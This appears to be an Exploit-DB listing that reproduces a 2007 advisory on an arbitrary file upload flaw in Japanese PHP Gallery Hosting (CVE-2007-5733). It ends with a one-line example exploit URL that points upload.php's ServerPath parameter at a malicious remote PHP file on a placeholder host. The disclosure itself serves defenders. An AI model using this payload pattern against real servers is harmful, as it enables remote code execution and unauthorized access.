Japanese PHP Gallery Hosting Arbitrary File Upload Vulnerability

2007-10-23T00:00:00
ID EDB-ID:30703
Type exploitdb
Reporter Pete Houston
Modified 2007-10-23T00:00:00

Description

Japanese PHP Gallery Hosting Arbitrary File Upload Vulnerability. CVE-2007-5733. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/26179/info

Japanese PHP Gallery Hosting is prone to an arbitrary-file-upload vulnerability because it fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Versions of Japanese PHP Gallery Hosting released prior to 10/2007 are vulnerable.

http://www.example.com/upload/upload.php?ServerPath=http://www.example2.com/malicious.php.arbitraryextension